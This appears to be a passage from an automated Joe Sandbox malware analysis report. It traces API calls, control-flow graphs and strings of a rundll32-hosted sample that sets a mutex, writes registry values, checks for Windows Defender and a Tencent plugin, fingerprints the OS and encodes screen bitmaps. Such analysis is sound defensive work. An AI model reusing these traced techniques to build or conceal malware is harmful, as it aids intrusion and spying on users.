                              • API String ID: 640718063-3203441087
                              • Opcode ID: 8abab83ab64dfcf743ee493e72094c5facc81c5990ebb1c7d3766fc8e920363d
                              • Instruction ID: 96622bcc1ea64264dbf44f4524985dc4f31d2f8339a70feefe1a4326984c6ce5
                              • Opcode Fuzzy Hash: 8abab83ab64dfcf743ee493e72094c5facc81c5990ebb1c7d3766fc8e920363d
                              • Instruction Fuzzy Hash: E36191B1A50308BFE720DFA8DC49FAAB7F8FF48710F104519F645A72D0DAB0A9448B64

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2780 4dbaca0-4dbacbb 2781 4dbacbd-4dbaceb RegOpenKeyExW 2780->2781 2782 4dbad14-4dbad1f 2780->2782 2783 4dbad09-4dbad0e 2781->2783 2784 4dbaced-4dbad03 RegQueryValueExW 2781->2784 2785 4dbb7c7-4dbb7cd call 4db2c80 2782->2785 2786 4dbad25-4dbad2c 2782->2786 2783->2782 2790 4dbb7d0-4dbb7d6 2783->2790 2784->2783 2785->2790 2787 4dbad7a-4dbad81 2786->2787 2788 4dbaf73-4dbb02b call 4dbf667 call 4dc67e0 call 4dbef4e call 4dc7660 call 4dbf667 call 4dbce90 call 4dbef4e 2786->2788 2787->2790 2791 4dbad87-4dbadb9 call 4dbf667 call 4dc67e0 2787->2791 2838 4dbb0f3-4dbb11a call 4dbf989 CloseHandle 2788->2838 2839 4dbb031-4dbb07e call 4dc7660 RegCreateKeyW 2788->2839 2802 4dbadbb-4dbadcf wsprintfW 2791->2802 2803 4dbadd2-4dbadde 2791->2803 2802->2803 2806 4dbae2a-4dbae81 call 4dbef4e call 4dc7660 call 4db2b90 call 4dbef59 * 2 2803->2806 2807 4dbade0 2803->2807 2810 4dbade4-4dbadef 2807->2810 2813 4dbadf0-4dbadf6 2810->2813 2816 4dbadf8-4dbadfb 2813->2816 2817 4dbae16-4dbae18 2813->2817 2821 4dbadfd-4dbae05 2816->2821 2822 4dbae12-4dbae14 2816->2822 2818 4dbae1b-4dbae1d 2817->2818 2823 4dbae1f-4dbae28 2818->2823 2824 4dbae84-4dbae99 2818->2824 2821->2817 2827 4dbae07-4dbae10 2821->2827 2822->2818 2823->2806 2823->2810 2830 4dbaea0-4dbaea6 2824->2830 2827->2813 2827->2822 2833 4dbaea8-4dbaeab 2830->2833 2834 4dbaec6-4dbaec8 2830->2834 2835 4dbaead-4dbaeb5 2833->2835 2836 4dbaec2-4dbaec4 2833->2836 2837 4dbaecb-4dbaecd 2834->2837 2835->2834 2841 4dbaeb7-4dbaec0 2835->2841 2836->2837 2842 4dbaecf-4dbaed1 2837->2842 2843 4dbaf3e-4dbaf70 call 4dbf989 CloseHandle call 4dbef59 2837->2843 2857 4dbb0db-4dbb0f0 RegCloseKey call 4dbfa29 2839->2857 2858 4dbb080-4dbb0d0 call 4dbef4e call 4db59c0 RegDeleteValueW RegSetValueExW 2839->2858 2841->2830 2841->2836 2848 4dbaed3-4dbaede call 4dbef59 2842->2848 2849 4dbaee5-4dbaeec 2842->2849 2848->2849 2855 4dbaeee-4dbaef9 call 4dbfa29 2849->2855 2856 4dbaf00-4dbaf04 2849->2856 2855->2856 2864 4dbaf06-4dbaf0f call 4dbef59 2856->2864 2865 4dbaf15-4dbaf39 call 4dbef80 2856->2865 2857->2838 2858->2857 2876 4dbb0d2-4dbb0d8 call 4dbfa29 2858->2876 2864->2865 2865->2806 2876->2857
                              APIs
                              • RegOpenKeyExW.KERNELBASE(80000001,Console,00000000,00020019,?), ref: 04DBACE3
                              • RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 04DBAD03
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: OpenQueryValue
                              • String ID: %s_bin$Console$Console\0$IpDatespecial
                              • API String ID: 4153817207-1338088003
                              • Opcode ID: dd23af12859f671b8f85d4eafdcc0cd2761b01f798a580e29c5d9c3690504440
                              • Instruction ID: 55428c4aa81d78659b699be0f9f503cbcb188825ec47d9527649daed3516b97b
                              • Opcode Fuzzy Hash: dd23af12859f671b8f85d4eafdcc0cd2761b01f798a580e29c5d9c3690504440
                              • Instruction Fuzzy Hash: 9FC180B1700201EBE714EF24DC45FAB73A9FB98718F044569F98A9B381E675F904C6E2

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2879 4db60e0-4db6135 call 4dc67e0 call 4dbffa9 2884 4db6191-4db61b8 CoCreateInstance 2879->2884 2885 4db6137-4db613e 2879->2885 2886 4db61be-4db6212 2884->2886 2887 4db63b2-4db63bf lstrlenW 2884->2887 2888 4db6140-4db6142 call 4db5fe0 2885->2888 2896 4db639a-4db63a8 2886->2896 2897 4db6218-4db6232 2886->2897 2889 4db63d1-4db63e0 2887->2889 2890 4db63c1-4db63cb lstrcatW 2887->2890 2895 4db6147-4db6149 2888->2895 2893 4db63ea-4db640a call 4dbef64 2889->2893 2894 4db63e2-4db63e7 2889->2894 2890->2889 2894->2893 2899 4db616b-4db618f call 4dbffa9 2895->2899 2900 4db614b-4db6169 lstrcatW * 2 2895->2900 2896->2887 2902 4db63aa-4db63af 2896->2902 2897->2896 2906 4db6238-4db6244 2897->2906 2899->2884 2899->2888 2900->2899 2902->2887 2907 4db6250-4db62f3 call 4dc67e0 wsprintfW RegOpenKeyExW 2906->2907 2910 4db6379-4db638f 2907->2910 2911 4db62f9-4db634a call 4dc67e0 RegQueryValueExW 2907->2911 2913 4db6392-4db6394 2910->2913 2915 4db636c-4db6373 RegCloseKey 2911->2915 2916 4db634c-4db636a lstrcatW * 2 2911->2916 2913->2896 2913->2907 2915->2910 2916->2915
                              APIs
                              • _memset.LIBCMT ref: 04DB611B
                              • lstrcatW.KERNEL32(04DE1F10,04DD510C,?,B7FCE562,75BF73E0,00000000,00000AD4), ref: 04DB615D
                              • lstrcatW.KERNEL32(04DE1F10,04DD535C,?,B7FCE562,75BF73E0,00000000,00000AD4), ref: 04DB6169
                              • CoCreateInstance.OLE32(04DD2480,00000000,00000017,04DD578C,?,?,B7FCE562,75BF73E0,00000000,00000AD4), ref: 04DB61B0
                              • _memset.LIBCMT ref: 04DB625E
                              • wsprintfW.USER32 ref: 04DB62C6
                              • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 04DB62EF
                              • _memset.LIBCMT ref: 04DB6306
                                • Part of subcall function 04DB5FE0: _memset.LIBCMT ref: 04DB600C
                                • Part of subcall function 04DB5FE0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00000000), ref: 04DB6018
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: _memset$Createlstrcat$InstanceOpenSnapshotToolhelp32wsprintf
                              • String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}$Windows Defender IOfficeAntiVirus implementation
                              • API String ID: 1221949200-1583895642
                              • Opcode ID: c9b49299c4083dc14efa10410fe3535bdaa8514155d866578d6d994c7dec08ce
                              • Instruction ID: 2ec27e0c51b5605b12213f861f42ac92c2842421008421eba7c64f0a20f31c49
                              • Opcode Fuzzy Hash: c9b49299c4083dc14efa10410fe3535bdaa8514155d866578d6d994c7dec08ce
                              • Instruction Fuzzy Hash: 468172B2B00228ABDB20DB55CC90FEEB7B8EB48704F0445D9F649A7241D674BE45CFA5

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2917 4db5ed0-4db5f0b CreateMutexW GetLastError 2918 4db5f2b-4db5f32 2917->2918 2919 4db5f0d 2917->2919 2921 4db5f93-4db5fbc GetModuleHandleW GetConsoleWindow call 4dbe450 2918->2921 2922 4db5f34-4db5f3a 2918->2922 2920 4db5f10-4db5f29 Sleep CreateMutexW GetLastError 2919->2920 2920->2918 2920->2920 2927 4db5fbe-4db5fd4 call 4dbef64 2921->2927 2928 4db5fd7-4db5fdf call 4dbe7b0 2921->2928 2923 4db5f40-4db5f71 call 4dc67e0 lstrlenW call 4db6cf0 2922->2923 2936 4db5f83-4db5f91 Sleep 2923->2936 2937 4db5f73-4db5f81 lstrcmpW 2923->2937 2936->2921 2936->2923 2937->2921 2937->2936
                              APIs
                              • CreateMutexW.KERNEL32(00000000,00000000,2024.12.19), ref: 04DB5EF6
                              • GetLastError.KERNEL32 ref: 04DB5EFE
                              • Sleep.KERNEL32(000003E8), ref: 04DB5F15
                              • CreateMutexW.KERNEL32(00000000,00000000,2024.12.19), ref: 04DB5F20
                              • GetLastError.KERNEL32 ref: 04DB5F22
                              • _memset.LIBCMT ref: 04DB5F49
                              • lstrlenW.KERNEL32(?), ref: 04DB5F56
                              • lstrcmpW.KERNEL32(?,04DD5328), ref: 04DB5F7D
                              • Sleep.KERNEL32(000003E8), ref: 04DB5F88
                              • GetModuleHandleW.KERNEL32(00000000), ref: 04DB5F95
                              • GetConsoleWindow.KERNEL32 ref: 04DB5F9F
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: CreateErrorLastMutexSleep$ConsoleHandleModuleWindow_memsetlstrcmplstrlen
                              • String ID: 2024.12.19$key$open
                              • API String ID: 2922109467-2390376316
                              • Opcode ID: d41fc9222c7846f19f36f993a4a2b1bc354113097895b6168966d245da29c4a3
                              • Instruction ID: 08230956b3a2a7d283886a6fb59feb933784c1243886b864d6a93c7bfde05a98
                              • Opcode Fuzzy Hash: d41fc9222c7846f19f36f993a4a2b1bc354113097895b6168966d245da29c4a3
                              • Instruction Fuzzy Hash: 4E21A672A44305EBE714EF64EC65F9AB794EB88708F100829F645972C0DA74F909CBE3

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2938 4db6246-4db624d 2939 4db6250-4db62f3 call 4dc67e0 wsprintfW RegOpenKeyExW 2938->2939 2942 4db6379-4db638f 2939->2942 2943 4db62f9-4db6306 call 4dc67e0 2939->2943 2945 4db6392-4db6394 2942->2945 2946 4db630b-4db634a RegQueryValueExW 2943->2946 2945->2939 2949 4db639a-4db63a8 2945->2949 2947 4db636c-4db6373 RegCloseKey 2946->2947 2948 4db634c-4db636a lstrcatW * 2 2946->2948 2947->2942 2948->2947 2950 4db63aa-4db63af 2949->2950 2951 4db63b2-4db63bf lstrlenW 2949->2951 2950->2951 2952 4db63d1-4db63e0 2951->2952 2953 4db63c1-4db63cb lstrcatW 2951->2953 2954 4db63ea-4db640a call 4dbef64 2952->2954 2955 4db63e2-4db63e7 2952->2955 2953->2952 2955->2954
                              APIs
                              • _memset.LIBCMT ref: 04DB625E
                              • wsprintfW.USER32 ref: 04DB62C6
                              • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 04DB62EF
                              • _memset.LIBCMT ref: 04DB6306
                              • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 04DB6342
                              • lstrcatW.KERNEL32(04DE1F10,?), ref: 04DB635E
                              • lstrcatW.KERNEL32(04DE1F10,04DD535C), ref: 04DB636A
                              • RegCloseKey.ADVAPI32(00000000), ref: 04DB6373
                              • lstrlenW.KERNEL32(04DE1F10,?,B7FCE562,75BF73E0,00000000,00000AD4), ref: 04DB63B7
                              • lstrcatW.KERNEL32(04DE1F10,04DD53D4,?,B7FCE562,75BF73E0,00000000,00000AD4), ref: 04DB63CB
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: lstrcat$_memset$CloseOpenQueryValuelstrlenwsprintf
                              • String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}$Windows Defender IOfficeAntiVirus implementation
                              • API String ID: 1671694837-1583895642
                              • Opcode ID: 3fee21299686d1f9db9d4f848b6e1ff525f2632f890eb5a198e0d9390c0d8e50
                              • Instruction ID: b43d0268d950d4397ae7346d782bd62941413c0b63e954da88651dcb59d660f3
                              • Opcode Fuzzy Hash: 3fee21299686d1f9db9d4f848b6e1ff525f2632f890eb5a198e0d9390c0d8e50
                              • Instruction Fuzzy Hash: 5D4196B1600228ABDB24DB55CC54FFEB7B8AF48705F0441C9F349A7281D674AA85CFA5

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2958 4db7410-4db7426 LoadLibraryW 2959 4db751e-4db7522 2958->2959 2960 4db742c-4db743a GetProcAddress 2958->2960 2961 4db7440-4db74a5 call 4dbf7b8 call 4dbef4e call 4db7390 2960->2961 2962 4db7517-4db7518 FreeLibrary 2960->2962 2970 4db74b2-4db74b6 2961->2970 2971 4db74a7-4db74b0 2961->2971 2962->2959 2972 4db74bb-4db74eb RegOpenKeyExW RegQueryValueExW 2970->2972 2971->2972 2973 4db74ed-4db74ef 2972->2973 2974 4db7502-4db750d RegCloseKey call 4dbfa29 2972->2974 2973->2974 2975 4db74f1-4db74ff call 4dbfb6e 2973->2975 2978 4db7512-4db7516 2974->2978 2975->2974 2978->2962
                              APIs
                              • LoadLibraryW.KERNEL32(ntdll.dll,74DEDF80,?,?,?,04DB55A1,0000035E,000002FA), ref: 04DB741C
                              • GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 04DB7432
                              • swprintf.LIBCMT ref: 04DB746F
                                • Part of subcall function 04DB7390: GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,04DB74A3), ref: 04DB73BD
                                • Part of subcall function 04DB7390: GetProcAddress.KERNEL32(00000000), ref: 04DB73C4
                                • Part of subcall function 04DB7390: GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,04DB74A3), ref: 04DB73D2
                              • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,000002FA), ref: 04DB74C7
                              • RegQueryValueExW.KERNEL32(000002FA,ProductName,00000000,00000001,00000000,?), ref: 04DB74E3
                              • RegCloseKey.KERNEL32(000002FA), ref: 04DB7506
                              • FreeLibrary.KERNEL32(00000000,?,?,?,04DB55A1,0000035E,000002FA), ref: 04DB7518
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: AddressLibraryProc$CloseFreeHandleInfoLoadModuleNativeOpenQuerySystemValueswprintf
                              • String ID: %d.%d.%d$ProductName$RtlGetNtVersionNumbers$SOFTWARE\Microsoft\Windows NT\CurrentVersion$ntdll.dll
                              • API String ID: 2158625971-3190923360
                              • Opcode ID: facacc9bb9db3f2fe39a7c5544d882d9fa9972512471af9a5051aef6eb387dda
                              • Instruction ID: 3ac757c08aa6046f45408d5194164e42f166c3355245325ff098989a440b9b9f
                              • Opcode Fuzzy Hash: facacc9bb9db3f2fe39a7c5544d882d9fa9972512471af9a5051aef6eb387dda
                              • Instruction Fuzzy Hash: 4D31B671B01208BBDB15DBA4DD55EFF77BCEB48700F104558BA06E6241E674EB00CBA0
                              APIs
                              • GlobalAlloc.KERNEL32(00000002,?,B7FCE562,?,00000000,?), ref: 04DBC01E
                              • GlobalLock.KERNEL32(00000000), ref: 04DBC02A
                              • GlobalUnlock.KERNEL32(00000000), ref: 04DBC03F
                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 04DBC055
                              • EnterCriticalSection.KERNEL32(04DDFB64), ref: 04DBC093
                              • LeaveCriticalSection.KERNEL32(04DDFB64), ref: 04DBC0A4
                                • Part of subcall function 04DB9D30: GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 04DB9D54
                                • Part of subcall function 04DB9D30: GdipDisposeImage.GDIPLUS(?), ref: 04DB9D68
                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 04DBC0CC
                                • Part of subcall function 04DBA3B0: GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 04DBA3DD
                                • Part of subcall function 04DBA3B0: _free.LIBCMT ref: 04DBA453
                              • GetHGlobalFromStream.OLE32(?,?), ref: 04DBC0ED
                              • GlobalLock.KERNEL32(?), ref: 04DBC0F7
                              • GlobalFree.KERNEL32(00000000), ref: 04DBC10F
                                • Part of subcall function 04DB9B00: DeleteObject.GDI32(?), ref: 04DB9B32
                                • Part of subcall function 04DB9B00: EnterCriticalSection.KERNEL32(04DDFB64,?,?,?,04DB9ADB), ref: 04DB9B43
                                • Part of subcall function 04DB9B00: EnterCriticalSection.KERNEL32(04DDFB64,?,?,?,04DB9ADB), ref: 04DB9B58
                                • Part of subcall function 04DB9B00: GdiplusShutdown.GDIPLUS(00000000,?,?,?,04DB9ADB), ref: 04DB9B64
                                • Part of subcall function 04DB9B00: LeaveCriticalSection.KERNEL32(04DDFB64,?,?,?,04DB9ADB), ref: 04DB9B75
                                • Part of subcall function 04DB9B00: LeaveCriticalSection.KERNEL32(04DDFB64,?,?,?,04DB9ADB), ref: 04DB9B7C
                              • GlobalSize.KERNEL32(00000000), ref: 04DBC125
                              • GlobalUnlock.KERNEL32(?), ref: 04DBC1A0
                              • GlobalFree.KERNEL32(00000000), ref: 04DBC1C8
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: Global$CriticalSection$Stream$CreateEnterGdipLeave$FreeFromImageLockSizeUnlock$AllocBitmapDeleteDisposeEncodersGdiplusObjectShutdown_free
                              • String ID:
                              • API String ID: 1483550337-0
                              • Opcode ID: 01f8ec170c4cdc2282840ed64fa05f83633580d43a15436a8a34f38d4e2000fa
                              • Instruction ID: 964b1ad2a88beaf334bf3191758ab52673fb11d43d620e95b45ed11e3be58b60
                              • Opcode Fuzzy Hash: 01f8ec170c4cdc2282840ed64fa05f83633580d43a15436a8a34f38d4e2000fa
                              • Instruction Fuzzy Hash: 886106B1E01218EFDB10EFA4D8949DEBBB8FF49704F10856EE516A7340DB34A901CBA0
                              APIs
                              • _memset.LIBCMT ref: 04DB6452
                              • RegOpenKeyExW.KERNEL32(80000001,Software\Tencent\Plugin\VAS,00000000,000F003F,?), ref: 04DB6472
                              • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 04DB64B4
                              • _memset.LIBCMT ref: 04DB64F0
                              • _memset.LIBCMT ref: 04DB651E
                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00000000,75BF73E0,00000AD4), ref: 04DB654A
                              • lstrlenW.KERNEL32(?,?,?,?,00000000,75BF73E0,00000AD4), ref: 04DB6553
                              • lstrlenW.KERNEL32(?,?,?,?,00000000,75BF73E0,00000AD4), ref: 04DB6565
                              • RegCloseKey.ADVAPI32(?,00000000,75BF73E0,00000AD4), ref: 04DB65B5
                              • lstrlenW.KERNEL32(?), ref: 04DB65C5
                              Strings
                              • Software\Tencent\Plugin\VAS, xrefs: 04DB6468
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: _memsetlstrlen$CloseEnumInfoOpenQuery
                              • String ID: Software\Tencent\Plugin\VAS
                              • API String ID: 2921034913-3343197220
                              • Opcode ID: 6740dd69e7fd162d17e1592d0848b3e78dc07182b0366dc93814ba2a912ad895
                              • Instruction ID: 3a7d87d86c5439572a277822781d7576d277b540753bbffa39d3cb125803301b
                              • Opcode Fuzzy Hash: 6740dd69e7fd162d17e1592d0848b3e78dc07182b0366dc93814ba2a912ad895
                              • Instruction Fuzzy Hash: D64189F1A40219EBDB24DB50CD85FEA73B8EB44704F0085D9F709B7181EA70EA858BA5
                              APIs
                                • Part of subcall function 04DB52C0: InterlockedDecrement.KERNEL32(00000008), ref: 04DB530C
                                • Part of subcall function 04DB52C0: SysFreeString.OLEAUT32(00000000), ref: 04DB5321
                                • Part of subcall function 04DB52C0: SysAllocString.OLEAUT32(04DD5148), ref: 04DB5372
                              • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,?,04DB6934,00000000,00000994), ref: 04DB678B
                              • GetLastError.KERNEL32 ref: 04DB6791
                              • GetProcessHeap.KERNEL32(00000008,?), ref: 04DB67A9
                              • HeapAlloc.KERNEL32(00000000), ref: 04DB67B0
                              • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,?,?), ref: 04DB67D2
                              • LookupAccountSidW.ADVAPI32(00000000,?,?,00000100,?,00000100,?), ref: 04DB6800
                              • GetLastError.KERNEL32 ref: 04DB680A
                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 04DB6879
                              • HeapFree.KERNEL32(00000000), ref: 04DB6880
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: Heap$AllocErrorFreeInformationLastProcessStringToken$AccountDecrementInterlockedLookup
                              • String ID: NONE_MAPPED
                              • API String ID: 1317816589-2950899194
                              • Opcode ID: 2a90b52ba7e99c1c8ee335a0fc1f4457b88f35af0e57cbbc3df74e8351b93bcd
                              • Instruction ID: 5abe6026112a93466c5456caac101c5d90c9c06f01c3e5fe1faf6471188bcc46
                              • Opcode Fuzzy Hash: 2a90b52ba7e99c1c8ee335a0fc1f4457b88f35af0e57cbbc3df74e8351b93bcd
                              • Instruction Fuzzy Hash: 1141A2B5A01208EBDB24DF54DD94FEE7378EB84704F0040E9E64AA7240DB74AE85CFA5
                              APIs
                              • memmove.VCRUNTIME140(?,?,00000098), ref: 6CC14A3A
                              • memmove.VCRUNTIME140(?,?,00000188), ref: 6CC14A7C
                              • memmove.VCRUNTIME140(?,?,00000029), ref: 6CC14C4B
                              • memmove.VCRUNTIME140(?,?,00000029), ref: 6CC14D08
                              • memmove.VCRUNTIME140(?,?,00000029), ref: 6CC14D40
                              • memmove.VCRUNTIME140(?,?,000000D0), ref: 6CC14DC4
                              • memmove.VCRUNTIME140(?,?,000000D4), ref: 6CC14DDB
                              • memmove.VCRUNTIME140(?,?,000000D4), ref: 6CC14E62
                              • memmove.VCRUNTIME140(?,?,00000114), ref: 6CC14F5D
                              • memmove.VCRUNTIME140(?,?,00000114), ref: 6CC1502A
                              • memmove.VCRUNTIME140(?,?,000000B8), ref: 6CC15052
                              • memmove.VCRUNTIME140(?,?,000000B8), ref: 6CC15104
                              • memmove.VCRUNTIME140(?,00000009,00000118), ref: 6CC1534C
                              • memmove.VCRUNTIME140(?,00000009,00000118), ref: 6CC15381
                              • memmove.VCRUNTIME140(?,00000009,00000118), ref: 6CC15832
                              • memmove.VCRUNTIME140(?,?,00000118), ref: 6CC15EB4
                              • memmove.VCRUNTIME140(?,?,0000011C), ref: 6CC15ED2
                              • memmove.VCRUNTIME140(0000002C,?,0000011C), ref: 6CC15F29
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove
                              • String ID: U9W{
                              • API String ID: 2162964266-3288374708
                              • Opcode ID: e08d6ca63233d99300c7d0dfce97315346de34412a9d50d9b01b2a1700f951be
                              • Instruction ID: b4d463b8a3ea65771647e25b4c006c3e3235bbb90ef7d2ad190d3d3024de5059
                              • Opcode Fuzzy Hash: e08d6ca63233d99300c7d0dfce97315346de34412a9d50d9b01b2a1700f951be
                              • Instruction Fuzzy Hash: 3F22BE75908B858FC722CF25C8807DBB7F5BF9A301F044A6DD8881F642EB709589DB92
                              APIs
                              • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 04DBA3DD
                              • _malloc.LIBCMT ref: 04DBA421
                              • _free.LIBCMT ref: 04DBA453
                              • GdipGetImageEncoders.GDIPLUS(?,?,00000008), ref: 04DBA472
                              • GdipSaveImageToStream.GDIPLUS(00000000,?,?,00000000), ref: 04DBA4E4
                              • GdipDisposeImage.GDIPLUS(00000000), ref: 04DBA4EF
                              • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 04DBA515
                              • GdipDisposeImage.GDIPLUS(00000000), ref: 04DBA52D
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: Gdip$Image$DisposeEncoders$BitmapCreateFromSaveSizeStream_free_malloc
                              • String ID: &
                              • API String ID: 2794124522-3042966939
                              • Opcode ID: b47876c5398676345a9b57e5c024cdbc06a00509f4b1505159697864065484a3
                              • Instruction ID: 93ca8f5e9ee9c0a784eec75af29061d7f83117ce4cd940005baeb0483bb5f65a
                              • Opcode Fuzzy Hash: b47876c5398676345a9b57e5c024cdbc06a00509f4b1505159697864065484a3
                              • Instruction Fuzzy Hash: C7514CB1E00219DFDB04DFA4D848AEEB7B8FF48704F048169EA46A7750E634B945CBE1
                              APIs
                              • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE,00000000,00000102,?), ref: 04205392
                              • RegDeleteValueW.KERNEL32(?,IpDates_info), ref: 042053A2
                              • RegSetValueExW.KERNEL32(?,IpDates_info,00000000,00000003,0421C7D8,000012A0), ref: 042053C0
                              • RegCloseKey.KERNEL32(?), ref: 042053CB
                              • OpenProcess.KERNEL32(00000400,00000000,?), ref: 0420541F
                              • GetExitCodeProcess.KERNEL32(00000000,?), ref: 0420542B
                              • Sleep.KERNEL32(00000BB8), ref: 04205444
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3543705474.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: true
                              • Associated: 00000003.00000002.3543705474.000000000421F000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4200000_rundll32.jbxd
                              Similarity
                              • API ID: OpenProcessValue$CloseCodeDeleteExitSleep
                              • String ID: IpDates_info$SOFTWARE
                              • API String ID: 864241144-2243437601
                              • Opcode ID: 14ba62e7355e9d32d1c467ed3d9539e80b1975b97e48fb0a025daba82dbca7c7
                              • Instruction ID: a1ccf23cb7e1c693c440f052035b22f2be5ddb9300b37d773b3bfdffc8023406
                              • Opcode Fuzzy Hash: 14ba62e7355e9d32d1c467ed3d9539e80b1975b97e48fb0a025daba82dbca7c7
                              • Instruction Fuzzy Hash: 4241F532764241BBD310CF249809B7A7BE4EBA5744FDC9458E486961D3E7B0F881CF92
                              APIs
                              • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE,00000000,00000102,?), ref: 04205392
                              • RegDeleteValueW.KERNEL32(?,IpDates_info), ref: 042053A2
